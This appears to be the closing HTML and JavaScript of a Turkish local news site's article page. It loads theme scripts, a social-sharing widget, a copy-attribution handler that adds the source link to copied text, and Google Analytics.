<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('71450', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
